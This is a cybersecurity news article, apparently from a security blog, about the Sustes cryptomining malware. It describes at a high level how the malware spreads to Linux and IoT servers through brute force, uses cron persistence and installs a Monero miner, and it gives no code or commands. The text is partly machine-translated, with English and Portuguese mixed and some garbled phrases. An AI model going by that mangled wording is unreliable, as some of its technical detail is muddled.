CYBER NEWS

Sustes personalizados Malware infecta Linux e servidores da Internet das coisas Worldwide

The Sustes malware is a custom virus that was recently discovered in a global infection. It infects via a unique mechanism and is designed to load a cryptocurrency miner infection onto the target systems. At the moment the made impact cannot be determined.




The Custom Sustes Malware Infects Servers With Miner Code

A recently published security report has revealed a new threat identified as the Sustes malware. It is of interest by the specialists as Sustes is entirely custom made by an unknown hacker or criminal collective. What’s particularly interesting about it is the way it is distributed — it doesn’t infect directly via a worm or a direct injection. The victim hosts so far showcase that the targets are mainly Linux and IoT servers. The infection happens through exploitation and brute force attempts of servers. A script is being launched which will drop and execute other software including a dropper.

Story relacionado: Xbash: o Four-Headed dragão de Malware Set Contra Windows e Linux

The procedure launches a complex behavior pattern:

  • The first actions are related to a proteção discrição técnica. It will scan for applications and services that may be found on the target systems. Using application signatures the malicious engine will identify if such software is installed.
  • Network connections will be evaluated and those connecting to specific addresses will be killed.
  • When these two commands have been complete the payload dropper will be initiated and download the Sustes malware to the target hosts.
  • A cron tab will be set up to periodically execute malware code.

The custom Sustes malware will download a configuration file from a remote server featuring several wallet addresses. This is part of the cryptocurrency miner deployment process which will install a Monero-based application. The analysis of the addresses has lead the security analysts into believing that that the pools and proxies have been deployed by the hackers as well.

The name Sustes comes from the process name which is a renamed and customized version of a popular miner used by ordinary computer users. It will follow the same mode of operations as other related malware by taking advantage of the available system resources in order to carry out complex calculations. When they are reported the results will be reported to the pools which will reward digital currency (in the form of Monero tokens) to the operators.

The dangerous characteristic is the fact that an estimate of the infected computers cannot be made at this time. The only way to prevent the infiltrations is to strengthen the network security of the Linux and IoT servers exposed in public. It is very possible that further attacks will be carried out with other distribution tactics.

Avatar

Martin Beltov

Martin formou-se na publicação da Universidade de Sofia. Como a segurança cibernética entusiasta ele gosta de escrever sobre as ameaças mais recentes e mecanismos de invasão.

mais Posts

Me siga:
Twitter

2 Comentários
  1. AvatarTrevor Daniel

    just picked it up on a raspberry pi running Node-Red

    completely my fault

    Resposta
    1. Milena DimitrovaMilena Dimitrova

      hey Trevor, o que aconteceu?

      Resposta

Deixe um comentário

seu endereço de e-mail não será publicado. Campos obrigatórios são marcados *

limite de tempo está esgotado. Recarregue CAPTCHA.

Compartilhar no Facebook Compartilhar
Carregando...
Compartilhar no Twitter chilrear
Carregando...
Compartilhar no Google Plus Compartilhar
Carregando...
Partilhar no Linkedin Compartilhar
Carregando...
Compartilhar no Digg Compartilhar
Compartilhar no Reddit Compartilhar
Carregando...
Partilhar no StumbleUpon Compartilhar
Carregando...